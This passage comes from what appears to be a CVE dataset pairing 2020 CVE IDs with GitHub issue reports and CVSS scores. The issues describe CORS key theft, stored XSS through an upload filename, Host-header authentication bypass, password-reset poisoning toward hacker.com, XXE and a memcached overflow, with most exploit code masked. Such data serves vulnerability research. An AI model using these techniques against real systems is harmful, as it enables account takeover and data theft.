  46067. "description": "Misconfigured CORS allows a malicious user to fetch api keys. Just a security issue I noticed where the accepted origins on CORS appear to be vulnerable. If an authenticated user visits a page such as the following, the VICTIMSKEY is alerted. This could also be sent to an attacker. ` APITAG APITAG APITAG APITAG function APITAG { var xhttp = new APITAG APITAG = APITAG { if APITAG NUMBERTAG APITAG NUMBERTAG APITAG = APITAG } }; APITAG \" URLTAG \", true); APITAG = true; APITAG } APITAG APITAG APITAG APITAG APITAG CORS APITAG Exploit APITAG APITAG full content of page APITAG APITAG APITAG Exploit APITAG APITAG APITAG APITAG",
  46068. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  46069. "severity": "HIGH",
  46070. "baseScore": 7.5,
  46071. "impactScore": 3.6,
  46072. "exploitabilityScore": 3.9
  46073. },
  46074. {
  46075. "CVE_ID": "CVE-2020-10594",
  46076. "Issue_Url_old": "https://github.com/Styria-Digital/django-rest-framework-jwt/issues/36",
  46077. "Issue_Url_new": "https://github.com/styria-digital/django-rest-framework-jwt/issues/36",
  46078. "Repo_new": "styria-digital/django-rest-framework-jwt",
  46079. "Issue_Created_At": "2020-03-02T20:17:34Z",
  46080. "description": "Blacklisted tokens can still be refreshed. If you configure an app to allow blacklisting tokens and turn APITAG on, then you can still operate the refresh endpoint using a blacklisted token, which allows you to side step the fact that the token is invalidated.",
  46081. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  46082. "severity": "CRITICAL",
  46083. "baseScore": 9.1,
  46084. "impactScore": 5.2,
  46085. "exploitabilityScore": 3.9
  46086. },
  46087. {
  46088. "CVE_ID": "CVE-2020-10594",
  46089. "Issue_Url_old": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484",
  46090. "Issue_Url_new": "https://github.com/jpadilla/django-rest-framework-jwt/issues/484",
  46091. "Repo_new": "jpadilla/django-rest-framework-jwt",
  46092. "Issue_Created_At": "2019-07-08T11:01:47Z",
  46093. "description": "Status. Hello there, For a long time now I've honestly thought I'd have the time and energy to come back and work on this project, and I think I still don't. I've not worked on any project recently needing it, which makes it harder to find time to come back. At some point I also noticed I no longer liked how the project had evolved and that it deserved a fair redesign and there are a few fundamental changes required. Now I'm certain that I wouldn't be able to work on this with the care required for a major version bump. I'm definitely not proud at how long it has taken me to make this or any update, I recognize that and I'm sorry for not having spoken out sooner. There's two efforts/projects that I'd like to point out to: Fork: URLTAG Drop in updated replacement fork. I'm willing to transfer repo, pypi, etc, to keep this going. Alternative: URLTAG Many of the changes that I've wanted to work on are already done here. This is what I would probably use today. Learned quite a few things from this. Thanks to everyone, including past collaborators and contributors. \u2764\ufe0f",
  46094. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
  46095. "severity": "CRITICAL",
  46096. "baseScore": 9.1,
  46097. "impactScore": 5.2,
  46098. "exploitabilityScore": 3.9
  46099. },
  46100. {
  46101. "CVE_ID": "CVE-2020-10596",
  46102. "Issue_Url_old": "https://github.com/opencart/opencart/issues/7810",
  46103. "Issue_Url_new": "https://github.com/opencart/opencart/issues/7810",
  46104. "Repo_new": "opencart/opencart",
  46105. "Issue_Created_At": "2020-01-09T04:23:52Z",
  46106. "description": "Stored Cross Site Scripting APITAG on Opencart Admin Dashboard. What version of APITAG are you reporting this for? Opencart NUMBERTAG Describe the bug Stored Cross Site Scripting (XSS) Authenticated is found in users image upload section in opencart admin panel. Opencart is accepting filenames with arbitrary code in it and not escaping them so the APITAG get executed. Malicious script in the admin dashboard can be injected permanently and can be used to steal the user\u2019s sensitive information like cookies, keystrokes, account information etc To Reproduce Steps to reproduce the behavior NUMBERTAG Go to PATHTAG and login with credentials NUMBERTAG Then navigate to APITAG and click on Action button on top right corner. FILETAG NUMBERTAG Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload \"> APITAG and then upload it as new user profile image NUMBERTAG After the upload completes the XSS pop up executes as shown below and it will gets executed each time someone visits the Image manager section. FILETAG Expected behavior Escaping and sanitation of HTML tags/ Special characters before storing or processing them, so that the code does not executes. Although XSS was strictly filtered on other sections, here we were able to execute it because of filename so filenames, file extensions and headers should be analyzed to prevent XSS and other file upload vulnerabilities. Screenshots / Screen recordings FILETAG Server / Test environment (please complete the following information): Kali Linu NUMBERTAG PHP version NUMBERTAG Apache version NUMBERTAG Browser(s) tested with: Mozilla Firefox Latest Build",
  46107. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  46108. "severity": "MEDIUM",
  46109. "baseScore": 5.4,
  46110. "impactScore": 2.7,
  46111. "exploitabilityScore": 2.3
  46112. },
  46113. {
  46114. "CVE_ID": "CVE-2020-10672",
  46115. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2659",
  46116. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2659",
  46117. "Repo_new": "fasterxml/jackson-databind",
  46118. "Issue_Created_At": "2020-03-16T00:52:40Z",
  46119. "description": "Block one more gadget type ( ). (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Reporters: Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46120. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46121. "severity": "HIGH",
  46122. "baseScore": 8.8,
  46123. "impactScore": 5.9,
  46124. "exploitabilityScore": 2.8
  46125. },
  46126. {
  46127. "CVE_ID": "CVE-2020-10673",
  46128. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2660",
  46129. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2660",
  46130. "Repo_new": "fasterxml/jackson-databind",
  46131. "Issue_Created_At": "2020-03-18T01:32:04Z",
  46132. "description": "Block one more gadget type (TO BE FILLED). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Reporter: threedr3am Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46133. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46134. "severity": "HIGH",
  46135. "baseScore": 8.8,
  46136. "impactScore": 5.9,
  46137. "exploitabilityScore": 2.8
  46138. },
  46139. {
  46140. "CVE_ID": "CVE-2020-10675",
  46141. "Issue_Url_old": "https://github.com/buger/jsonparser/issues/188",
  46142. "Issue_Url_new": "https://github.com/buger/jsonparser/issues/188",
  46143. "Repo_new": "buger/jsonparser",
  46144. "Issue_Created_At": "2020-03-09T10:40:07Z",
  46145. "description": "infinite loop in Delete. Hi. A call to function Delete may cause infinite loop. I wish you could take a look. URLTAG ERRORTAG",
  46146. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  46147. "severity": "HIGH",
  46148. "baseScore": 7.5,
  46149. "impactScore": 3.6,
  46150. "exploitabilityScore": 3.9
  46151. },
  46152. {
  46153. "CVE_ID": "CVE-2020-10678",
  46154. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/6258",
  46155. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/6258",
  46156. "Repo_new": "octopusdeploy/issues",
  46157. "Issue_Created_At": "2020-03-17T01:40:34Z",
  46158. "description": "Authentication provider sync error. Details coming soon",
  46159. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  46160. "severity": "HIGH",
  46161. "baseScore": 8.8,
  46162. "impactScore": 5.9,
  46163. "exploitabilityScore": 2.8
  46164. },
  46165. {
  46166. "CVE_ID": "CVE-2020-10683",
  46167. "Issue_Url_old": "https://github.com/dom4j/dom4j/issues/87",
  46168. "Issue_Url_new": "https://github.com/dom4j/dom4j/issues/87",
  46169. "Repo_new": "dom4j/dom4j",
  46170. "Issue_Created_At": "2020-04-22T11:10:29Z",
  46171. "description": "APITAG uses system APITAG or APITAG which has unsecure defaults. The constructor APITAG calls one of the factory method form Java runtime library \u2013 APITAG or APITAG . These factory methods do not have safe defaults, such as downloading external entities. Create the new factory method APITAG which overrides Java runtime library defaults and sets following features: CODETAG",
  46172. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46173. "severity": "CRITICAL",
  46174. "baseScore": 9.8,
  46175. "impactScore": 5.9,
  46176. "exploitabilityScore": 3.9
  46177. },
  46178. {
  46179. "CVE_ID": "CVE-2020-10688",
  46180. "Issue_Url_old": "https://github.com/quarkusio/quarkus/issues/7248",
  46181. "Issue_Url_new": "https://github.com/quarkusio/quarkus/issues/7248",
  46182. "Repo_new": "quarkusio/quarkus",
  46183. "Issue_Created_At": "2020-02-18T08:07:18Z",
  46184. "description": "XSS vulnerability in APITAG Description The no resource endpoint HTML page which is rendered on ERRORTAG errors introduces XSS vulnerability. Given as an example a GET endpoint which accepts a paging parameter in the form \"start,offset\" (i.e NUMBERTAG A request like: APITAG would lead to the following exception, and the ERRORTAG page in turn would execute the script (alert in our case). ERRORTAG Implementation ideas Enable the ERRORTAG HTML page only in DEV mode.",
  46185. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  46186. "severity": "MEDIUM",
  46187. "baseScore": 6.1,
  46188. "impactScore": 2.7,
  46189. "exploitabilityScore": 2.8
  46190. },
  46191. {
  46192. "CVE_ID": "CVE-2020-10689",
  46193. "Issue_Url_old": "https://github.com/eclipse/che/issues/15651",
  46194. "Issue_Url_new": "https://github.com/eclipse/che/issues/15651",
  46195. "Repo_new": "eclipse/che",
  46196. "Issue_Created_At": "2020-01-10T11:56:26Z",
  46197. "description": "Improve isolation of Che theia and che machine exec components. Is your task related to a problem? Please describe. Under some conditions, there is a possibility to reach the port of one workspace from another workspace. To improve the isolation of the major Eclipse Che components we would like to. Describe the solution you'd like NUMBERTAG Use single pod for jwt proxy and other workspace containers NUMBERTAG make machine exec, theia remote runtime and theia endpoints listening to localhost only Describe alternatives you've considered n/a Additional context n/a",
  46198. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  46199. "severity": "MEDIUM",
  46200. "baseScore": 6.8,
  46201. "impactScore": 5.9,
  46202. "exploitabilityScore": 0.9
  46203. },
  46204. {
  46205. "CVE_ID": "CVE-2020-10699",
  46206. "Issue_Url_old": "https://github.com/open-iscsi/targetcli-fb/issues/162",
  46207. "Issue_Url_new": "https://github.com/open-iscsi/targetcli-fb/issues/162",
  46208. "Repo_new": "open-iscsi/targetcli-fb",
  46209. "Issue_Created_At": "2020-03-23T05:08:02Z",
  46210. "description": "PATHTAG is world writable. The systemd socket unit fails to specify any APITAG so the socket is world writable NUMBERTAG as such any user can connect to it and send commands to targetclid without authentication. This is a likely a security vulnerability. URLTAG",
  46211. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  46212. "severity": "HIGH",
  46213. "baseScore": 7.8,
  46214. "impactScore": 5.9,
  46215. "exploitabilityScore": 1.8
  46216. },
  46217. {
  46218. "CVE_ID": "CVE-2020-10729",
  46219. "Issue_Url_old": "https://github.com/ansible/ansible/issues/34144",
  46220. "Issue_Url_new": "https://github.com/ansible/ansible/issues/34144",
  46221. "Repo_new": "ansible/ansible",
  46222. "Issue_Created_At": "2017-12-21T14:02:15Z",
  46223. "description": "two random password lookups in same task return same value. ISSUE TYPE Bug Report COMPONENT NAME lookups ANSIBLE VERSION APITAG CONFIGURATION no custom config OS / ENVIRONMENT Linux SUMMARY two consecutive tasks that set facts from password lookup with same length get identical values. separate tasks or different length result in different values, as expected. STEPS TO REPRODUCE yaml name: Set random passwords for clusters set_fact: password1: \"{{ lookup('password', PATHTAG length NUMBERTAG password2: \"{{ lookup('password', PATHTAG length NUMBERTAG delegate_to: localhost delegate_facts: True debug: msg: APITAG APITAG EXPECTED RESULTS two different values ACTUAL RESULTS two identical values changing length for one of these, or using separate tasks, gives different values. URLTAG says \"A special case is using /dev/null as a path. The password lookup will generate a new random password each time\", thus the current behaviour is at least confusing and unexpected. from irc : CODETAG `",
  46224. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  46225. "severity": "MEDIUM",
  46226. "baseScore": 5.5,
  46227. "impactScore": 3.6,
  46228. "exploitabilityScore": 1.8
  46229. },
  46230. {
  46231. "CVE_ID": "CVE-2020-10732",
  46232. "Issue_Url_old": "https://github.com/google/kmsan/issues/76",
  46233. "Issue_Url_new": "https://github.com/google/kmsan/issues/76",
  46234. "Repo_new": "google/kmsan",
  46235. "Issue_Created_At": "2020-04-18T09:13:03Z",
  46236. "description": "BUG: KMSAN: uninit value in kmsan_handle_dma. While fuzzing latest KMSAN build with HEALER(syscall fuzzer, not published yet), uninit value is found in kmsan_handle_dma. It seems KMSAN found bugs in itself. Caused by this call sequence FILETAG . With this crash FILETAG . THE latest KMSAN is used with this config FILETAG .",
  46237. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:L",
  46238. "severity": "MEDIUM",
  46239. "baseScore": 4.4,
  46240. "impactScore": 2.5,
  46241. "exploitabilityScore": 1.8
  46242. },
  46243. {
  46244. "CVE_ID": "CVE-2020-10799",
  46245. "Issue_Url_old": "https://github.com/deeplook/svglib/issues/229",
  46246. "Issue_Url_new": "https://github.com/deeplook/svglib/issues/229",
  46247. "Repo_new": "deeplook/svglib",
  46248. "Issue_Created_At": "2020-02-25T11:18:21Z",
  46249. "description": "No disabling external entity expansion (XXE). Hi! I found that I can perform XXE attack when using svg2rlg function Code: CODETAG Payload APITAG CODETAG",
  46250. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46251. "severity": "CRITICAL",
  46252. "baseScore": 9.8,
  46253. "impactScore": 5.9,
  46254. "exploitabilityScore": 3.9
  46255. },
  46256. {
  46257. "CVE_ID": "CVE-2020-10807",
  46258. "Issue_Url_old": "https://github.com/mitre/caldera/issues/1405",
  46259. "Issue_Url_new": "https://github.com/mitre/caldera/issues/1405",
  46260. "Repo_new": "mitre/caldera",
  46261. "Issue_Created_At": "2020-03-18T15:12:57Z",
  46262. "description": "Serious Security Flaw: API Requests from localhost. Hi guys, While checking our your API I've found a serious security flaw, which allows any unauthenticated user to perform any kind of API requests, which basically makes the whole tool and therefore any agents on end hosts exposable to anyone having access to the Caldera REST API. The following function is responsible for checking authentication in your code: ERRORTAG Basically it allows to bypass authentication if APITAG is contained within APITAG (which is set to APITAG per default). You are using the aiohttp library, in which host is usually the Host header of the http request (see URLTAG This works fine if you are performing a curl request from localhost for example, but be aware that the HTTP Host header is mutable for any request performed by a user. So if you just overwrite the Host header with \"localhost NUMBERTAG while performing a request to a public IP for example Caldera assumes you are performing the request to localhost and therefore disables authentication checks. Here is a POC in Postman: APITAG Body of the request: APITAG Response: APITAG As you can see I've succesfully performed an API request while using a IP within my network and not localhost. I've set the Host header to localhost and were able to fetch details without any authentication. That really is a serious flaw in the application, if I have running productive agents an attacker can execute arbitrary commands in my network. I'd suggest removing the no authentication \"feature\" for requests to localhost completely. Thanks!",
  46263. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46264. "severity": "MEDIUM",
  46265. "baseScore": 5.3,
  46266. "impactScore": 1.4,
  46267. "exploitabilityScore": 3.9
  46268. },
  46269. {
  46270. "CVE_ID": "CVE-2020-10870",
  46271. "Issue_Url_old": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028",
  46272. "Issue_Url_new": "https://github.com/zim-desktop-wiki/zim-desktop-wiki/issues/1028",
  46273. "Repo_new": "zim-desktop-wiki/zim-desktop-wiki",
  46274. "Issue_Created_At": "2020-03-06T22:22:48Z",
  46275. "description": "Predictable /tmp/zim USER directory allows for denial of service. Description Zim creates temporary directories with predictable names. A malicious user could predict and create Zim's temporary directories and prevent other users from being able to start Zim, resulting in a denial of service. Steps to Reproduce NUMBERTAG Create two users: user1 and user NUMBERTAG As user1: APITAG NUMBERTAG As user2: Start Zim Zim will attempt to change the permissions of /tmp/user2 to NUMBERTAG Because /tmp/user2 is actually owned by user1, the call to APITAG will fail and Zim will crash. Workaround An affected user can set the $TMP or $TMPDIR environment variables to point to somewhere that is not world writable (e.g. APITAG ). Version Affected NUMBERTAG and later Operating System Linux Severity Low",
  46276. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  46277. "severity": "MEDIUM",
  46278. "baseScore": 5.5,
  46279. "impactScore": 3.6,
  46280. "exploitabilityScore": 1.8
  46281. },
  46282. {
  46283. "CVE_ID": "CVE-2020-10871",
  46284. "Issue_Url_old": "https://github.com/openwrt/luci/issues/3766",
  46285. "Issue_Url_new": "https://github.com/openwrt/luci/issues/3766",
  46286. "Repo_new": "openwrt/luci",
  46287. "Issue_Created_At": "2020-03-18T20:35:13Z",
  46288. "description": "security: information disclosure to unauthenticated guest. Recent openwrt builds show the administration menu to unauthenticated guests: an attacker would be able to know the presence of installed packages and services on the box. version banner: APITAG by APITAG Master (git NUMBERTAG APITAG NUMBERTAG ed0d NUMBERTAG APITAG SNAPSHOT r NUMBERTAG b NUMBERTAG b_ FILETAG",
  46289. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46290. "severity": "MEDIUM",
  46291. "baseScore": 5.3,
  46292. "impactScore": 1.4,
  46293. "exploitabilityScore": 3.9
  46294. },
  46295. {
  46296. "CVE_ID": "CVE-2020-10871",
  46297. "Issue_Url_old": "https://github.com/openwrt/luci/issues/3653",
  46298. "Issue_Url_new": "https://github.com/openwrt/luci/issues/3653",
  46299. "Repo_new": "openwrt/luci",
  46300. "Issue_Created_At": "2020-02-19T22:37:08Z",
  46301. "description": "Header topmenu shown logged out. On commit r NUMBERTAG a NUMBERTAG b NUMBERTAG a the topmenu \" APITAG \" is shown while no user logged in. FILETAG Any idea how to solve this issue? Thank you.",
  46302. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46303. "severity": "MEDIUM",
  46304. "baseScore": 5.3,
  46305. "impactScore": 1.4,
  46306. "exploitabilityScore": 3.9
  46307. },
  46308. {
  46309. "CVE_ID": "CVE-2020-10871",
  46310. "Issue_Url_old": "https://github.com/openwrt/luci/issues/3563",
  46311. "Issue_Url_new": "https://github.com/openwrt/luci/issues/3563",
  46312. "Repo_new": "openwrt/luci",
  46313. "Issue_Created_At": "2020-01-25T21:59:41Z",
  46314. "description": "luci base: menu and i NUMBERTAG n plays very BADLY with sysauth=false in master. APITAG pages with sysauth=false (e.g. status pages that should work even for an user that is not logged in) are broken on APITAG master. The symptom is that when you access the page with \"sysauth=false\" attribute, the menu disappears, as in: not even nodes that are also sysauth=false show up. What should happen: the menu should list all pages, always, and require authentication if you try to access one of them while lacking the required credentials. Translations are also broken, and doubly so NUMBERTAG They try to XHR something from a node that is below /admin/, even if you are on a node on an entirely different subtree (like say, a /status node that should work unauthenticated and be the first page the user gets when he connects to the modem NUMBERTAG Whatever the translation stuff tries to fetch is hiding behind a sysauth=true node, which renders it useless for any sysauth=false page [if the user is unauthenticated] Maybe the /l NUMBERTAG n/ or /i NUMBERTAG n/ namespace (or even wherever luci static ends up) should be used for anything the i NUMBERTAG n mechanism needs? It really doesn't make sense to have it tied to /admin/.",
  46315. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  46316. "severity": "MEDIUM",
  46317. "baseScore": 5.3,
  46318. "impactScore": 1.4,
  46319. "exploitabilityScore": 3.9
  46320. },
  46321. {
  46322. "CVE_ID": "CVE-2020-10931",
  46323. "Issue_Url_old": "https://github.com/memcached/memcached/issues/629",
  46324. "Issue_Url_new": "https://github.com/memcached/memcached/issues/629",
  46325. "Repo_new": "memcached/memcached",
  46326. "Issue_Created_At": "2020-03-23T09:21:26Z",
  46327. "description": "(DOS attack NUMBERTAG day buffer overflow vulnerability reveal. Hi, Memcached team, Recently, I revealed a buffer overflow vulnerability which may cause DOS attack. The exploit details can be found as following. Affect Version memcached NUMBERTAG memcached NUMBERTAG Root cause file location: APITAG NUMBERTAG FILETAG Code Audit CODETAG in line NUMBERTAG since there is no mechanism to verify the parameter's length, in this case, the length of \" extlen \" when calling memcpy function, It will cause buffer overflow if large value assigned to the extlen variable. POC APITAG for the POC snippet, first, if I assign a large value to the variable extlen , on the other hand, in order to bypass the validation of data packet which sent in following code snippet, APITAG we can construct a very large data packet. After that, the program will crash because of the issue mentioned above. Note: Please confirm this issue ASAP. Besides, just letting you know, I am gonna submit this issue to CVE mitre. Please let me if you have any questions. Sincerely, Icejl",
  46328. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  46329. "severity": "HIGH",
  46330. "baseScore": 7.5,
  46331. "impactScore": 3.6,
  46332. "exploitabilityScore": 3.9
  46333. },
  46334. {
  46335. "CVE_ID": "CVE-2020-10944",
  46336. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7468",
  46337. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7468",
  46338. "Repo_new": "hashicorp/nomad",
  46339. "Issue_Created_At": "2020-03-24T15:29:53Z",
  46340. "description": "Reserved issue. This a reserved issue for NUMBERTAG release.",
  46341. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  46342. "severity": "MEDIUM",
  46343. "baseScore": 5.4,
  46344. "impactScore": 2.7,
  46345. "exploitabilityScore": 2.3
  46346. },
  46347. {
  46348. "CVE_ID": "CVE-2020-10966",
  46349. "Issue_Url_old": "https://github.com/hestiacp/hestiacp/issues/748",
  46350. "Issue_Url_new": "https://github.com/hestiacp/hestiacp/issues/748",
  46351. "Repo_new": "hestiacp/hestiacp",
  46352. "Issue_Created_At": "2020-03-23T06:15:49Z",
  46353. "description": "Manipulation of Host Header lead to Account Takeover Vulnerability. Tbh, vulnerability is pretty simple. On line NUMBERTAG SERVER FILETAG So that means, $_SERVER FILETAG Actual Host header value \u0130S NOT hacker.com but the URL will be hacker.com in the password reset e mail. As you can following screenshot, even though the Vesta is being installed on APITAG on port NUMBERTAG URL placed in the e mail for account recovery is HACKER.com now. So if the admin user click on that link in the e mail, HACKER.COM will steal the code value which is enough for resetting password of the admin user. PS: I should mention that in the real life use case you can very similar domain name instead of hacker.com :) Since the e mail is being sanded from Vesta server, it\u2019s not a kind of phishing attack. FILETAG",
  46354. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
  46355. "severity": "MEDIUM",
  46356. "baseScore": 6.5,
  46357. "impactScore": 3.6,
  46358. "exploitabilityScore": 2.8
  46359. },
  46360. {
  46361. "CVE_ID": "CVE-2020-10968",
  46362. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2662",
  46363. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2662",
  46364. "Repo_new": "fasterxml/jackson-databind",
  46365. "Issue_Created_At": "2020-03-23T01:31:30Z",
  46366. "description": "Block one more gadget type (...). APITAG in Progress) Another gadget type(s) reported regarding a class of [TO BE FILLED]. See URLTAG for description of the general problem. Mitre id: Reporter: Fix will likely be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46367. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46368. "severity": "HIGH",
  46369. "baseScore": 8.8,
  46370. "impactScore": 5.9,
  46371. "exploitabilityScore": 2.8
  46372. },
  46373. {
  46374. "CVE_ID": "CVE-2020-10969",
  46375. "Issue_Url_old": "https://github.com/FasterXML/jackson-databind/issues/2642",
  46376. "Issue_Url_new": "https://github.com/fasterxml/jackson-databind/issues/2642",
  46377. "Repo_new": "fasterxml/jackson-databind",
  46378. "Issue_Created_At": "2020-03-04T00:05:00Z",
  46379. "description": "Block one more gadget type APITAG CVE to be allocated). (note: placeholder until verified/validated, fix provided) Another gadget type reported regarding a class of [TO BE ADDED]. See URLTAG for description of the general problem. Mitre id: to be allocated Reporters: threedr3am Fix will be included in NUMBERTAG Does not affect NUMBERTAG and later",
  46380. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  46381. "severity": "HIGH",
  46382. "baseScore": 8.8,
  46383. "impactScore": 5.9,
  46384. "exploitabilityScore": 2.8
  46385. },
  46386. {
  46387. "CVE_ID": "CVE-2020-10990",
  46388. "Issue_Url_old": "https://github.com/Accenture/mercury/issues/13",
  46389. "Issue_Url_new": "https://github.com/accenture/mercury/issues/13",
  46390. "Repo_new": "accenture/mercury",
  46391. "Issue_Created_At": "2020-01-06T00:12:35Z",
  46392. "description": "Security Contact Requested. MENTIONTAG and I found a security vulnerability within the mercury project. We were hoping to get a core maintainer's contact details to responsibly disclose this vulnerability.",
  46393. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46394. "severity": "CRITICAL",
  46395. "baseScore": 9.8,
  46396. "impactScore": 5.9,
  46397. "exploitabilityScore": 3.9
  46398. },
  46399. {
  46400. "CVE_ID": "CVE-2020-10991",
  46401. "Issue_Url_old": "https://github.com/mulesoft/apikit/issues/547",
  46402. "Issue_Url_new": "https://github.com/mulesoft/apikit/issues/547",
  46403. "Repo_new": "mulesoft/apikit",
  46404. "Issue_Created_At": "2020-03-25T08:01:53Z",
  46405. "description": "XXE in apikit. While reading the code in the apikit project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG",
  46406. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46407. "severity": "CRITICAL",
  46408. "baseScore": 9.8,
  46409. "impactScore": 5.9,
  46410. "exploitabilityScore": 3.9
  46411. },
  46412. {
  46413. "CVE_ID": "CVE-2020-10992",
  46414. "Issue_Url_old": "https://github.com/azkaban/azkaban/issues/2478",
  46415. "Issue_Url_new": "https://github.com/azkaban/azkaban/issues/2478",
  46416. "Repo_new": "azkaban/azkaban",
  46417. "Issue_Created_At": "2020-03-25T08:03:26Z",
  46418. "description": "XXE in Azkaban. While reading the code in the Azkaban project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG URLTAG",
  46419. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  46420. "severity": "CRITICAL",
  46421. "baseScore": 9.8,
  46422. "impactScore": 5.9,
  46423. "exploitabilityScore": 3.9
  46424. },
  46425. {
  46426. "CVE_ID": "CVE-2020-10993",
  46427. "Issue_Url_old": "https://github.com/osmandapp/Osmand/issues/8711",
  46428. "Issue_Url_new": "https://github.com/osmandapp/osmand/issues/8711",
  46429. "Repo_new": "osmandapp/osmand",
  46430. "Issue_Created_At": "2020-03-25T08:02:39Z",
  46431. "description": "XXE in Osmand. While reading the code in the Osmand project we ( MENTIONTAG and I) identified a vulnerability we wanted to raise. The vulnerability is an XXE vulnerability ( URLTAG and can be identified in the lines of code below: URLTAG",
  46432. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  46433. "severity": "CRITICAL",
  46434. "baseScore": 9.1,
  46435. "impactScore": 5.2,
  46436. "exploitabilityScore": 3.9
  46437. },
  46438. {
  46439. "CVE_ID": "CVE-2020-11004",
  46440. "Issue_Url_old": "https://github.com/Admidio/admidio/issues/908",
  46441. "Issue_Url_new": "https://github.com/admidio/admidio/issues/908",
  46442. "Repo_new": "admidio/admidio",
  46443. "Issue_Created_At": "2020-04-06T12:29:36Z",
  46444. "description": "Unauthenticated Blind SQL injection. Hi, I want to report a critical vulnerability in Admidio management system. Can you please start a security advisory in the security section and add me so we can discuss the vulnerability privately?",
  46445. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  46446. "severity": "HIGH",
  46447. "baseScore": 7.5,
  46448. "impactScore": 3.6,
  46449. "exploitabilityScore": 3.9
  46450. },
  46451. {
  46452. "CVE_ID": "CVE-2020-11005",
  46453. "Issue_Url_old": "https://github.com/SeppPenner/WindowsHello/issues/3",
  46454. "Issue_Url_new": "https://github.com/sepppenner/windowshello/issues/3",
  46455. "Repo_new": "sepppenner/windowshello",
  46456. "Issue_Created_At": "2019-08-22T02:16:23Z",
  46457. "description": "APITAG Security of the Encrypted data. If I use this library to encrypt text and write the output to a txt file, could another executable be able to decrypt the text using the static method APITAG from this same library, without the need to use Windows Hello Authentication? Maybe for somebody the answer to this question is clear from the code, but I'm just learning, and I do it in my spare time. Thanks.",
  46458. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  46459. "severity": "MEDIUM",
  46460. "baseScore": 5.5,
  46461. "impactScore": 3.6,
  46462. "exploitabilityScore": 1.8
  46463. },
  46464. {
  46465. "CVE_ID": "CVE-2020-11014",
  46466. "Issue_Url_old": "https://github.com/simpleledger/Electron-Cash-SLP/issues/126",
  46467. "Issue_Url_new": "https://github.com/simpleledger/electron-cash-slp/issues/126",
  46468. "Repo_new": "simpleledger/electron-cash-slp",
  46469. "Issue_Created_At": "2020-04-24T17:37:42Z",
